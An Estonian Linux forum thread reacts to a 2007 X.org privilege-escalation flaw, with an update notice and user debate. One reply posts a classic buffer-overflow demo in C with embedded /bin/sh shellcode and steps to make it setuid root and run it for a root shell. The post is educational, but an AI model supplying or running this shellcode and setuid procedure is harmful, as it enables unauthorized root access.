Viga X.org serveris :: Pingviini veeb

Viga X.org serveris

Vaata järgmist teemat
Vaata eelmist teemat

Pingviini veeb foorumi pealeht » Pingviin » Uudised » Turvauuendused » Viga X.org serveris

Autor

Sõnum

spott
Admin

Vanus: 44
Liitunud: 04.06.2005
Postitused: 8861

Distributsioon: Ubuntu

postitatud: 10.01.2007, 22:27 postituse pealkiri: Viga X.org serveris


On leitud ohtlik viga erinevates X.org serverites, mis võimaldavad X serverile ligi pääsedes võtta endale root kasutaja õigused. Kuna mitmel puhul on tegu väga lihtsa nipiga, kuidas seda teha, siis on kiiresti välja lastud ka vastavad parandused. Ohustatud on kõik X.org serveri versioonid. Erinevad distributsioonid on alustanud juba uuendatud pakettide välja laskmisega. Seega, kui Teie paketihaldur pakub uuendada X-i, siis laske see tal kindlasti teha. Lähemat infot saate LWN.net vahendusel.

_________________
Tellige endale sünnipäevaks, sõbrapäevaks või muuks tähtpäevaks kingitus: Kingitused internetist - NetiKink.eu

uniz
Vana Pingviin

Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare

postitatud: 10.01.2007, 22:33 postituse pealkiri: (teema puudub)


Ohustatud on kõik X.org serveri versioonid. Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..

HoHo
Vana Pingviin

Vanus: 40
Liitunud: 08.07.2005
Postitused: 527
Asukoht: Tallinn/Paide
Distributsioon: Gentoo

postitatud: 11.01.2007, 00:08 postituse pealkiri: (teema puudub)


Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.

taavi
Pingviini kasutaja

Liitunud: 25.07.2005
Postitused: 59

Distributsioon: Arch, Debian

postitatud: 11.01.2007, 00:37 postituse pealkiri: (teema puudub)

uniz kirjutas: < Vali > < Laienda >

Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..

Kas sa oled irooniline või täielik ignorant?

johnsmith
Vana Pingviin

Vanus: 50
Liitunud: 24.07.2006
Postitused: 714
Asukoht: Universum
Distributsioon: Ubuntu/Gentoo/FreeBSD

postitatud: 11.01.2007, 01:12 postituse pealkiri: (teema puudub)

Kõigepealt pead kasutajana sisse logima ja siis käivitad mingi legaalse programmi millele antakse valed parameetrid ja mille keegi assemblerit tundev koll on valmis meisterdanud.
Seal peavad mingid lisa moodulid olema ka asendatud.

Nende kõikide probleemide ema on setuid ja setgid õigusi omavad programmid.
Need programmid on tehtud, et kasutaja saaks käivitada mingi teenuse mis nõuab juure õigusi kuid olles sisse loginud tavakasutajana.
Selle asemel aga, et käivitada legaalne teenus kirjutab pätt programm puskurist üle ja käivitatakse hoopis shell juure õigustega.

Proovi ise

Kood: < Vali > < Laienda >

#include <stdio.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];

int main(int argc, char **argv){
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < (int) strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer, large_string);
return 0;
}

Kompileeri see ja su rootiks
chown root.root objektfile
chmod u+s objektfile
nüüd tagasi tavakasutajaks ja käivita see programm:
whoami ?

Tehnika on sama olenemata mis meetodit kasutatakse.

Soovitav on sellele programmile kinga anda pärast proovimist Smile

_________________
"Thinking is the hardest work there is, which is probably the reason why so few engage in it" - Henry Ford

uniz
Vana Pingviin

Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare

postitatud: 11.01.2007, 09:08 postituse pealkiri: (teema puudub)

HoHo kirjutas: < Vali > < Laienda >

Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.

Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..

priit
Vana Pingviin

Vanus: 41
Liitunud: 04.08.2005
Postitused: 521
Asukoht: Tartu
Distributsioon: CentOS / OS X

postitatud: 11.01.2007, 12:46 postituse pealkiri: (teema puudub)

uniz kirjutas: < Vali > < Laienda >

HoHo kirjutas: < Vali > < Laienda >

Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..

Ma ei tea nüüd, mul oli pikka aega Windows 98 arvutis, nuhkvara küll ei olnud...

uniz
Vana Pingviin

Vanus: 45
Liitunud: 18.05.2006
Postitused: 764

Distributsioon: ubuntucare

postitatud: 11.01.2007, 14:20 postituse pealkiri: (teema puudub)


Miks sa siis debiani kasutad?

priit
Vana Pingviin

Vanus: 41
Liitunud: 04.08.2005
Postitused: 521
Asukoht: Tartu
Distributsioon: CentOS / OS X

postitatud: 11.01.2007, 14:24 postituse pealkiri: (teema puudub)


Sest mulle meeldib. St mulle meeldivad alternatiivid, seda nii Linuxi, SkyOSi, BeOSi, Haiku, QNXi jmt näol. Kõiki olen kasutanud/katsetanud ja kavatsen ka edaspidi seda teha.

Pingviini veeb foorumi pealeht » Pingviin » Uudised » Turvauuendused » Viga X.org serveris

Vaata järgmist teemat
Vaata eelmist teemat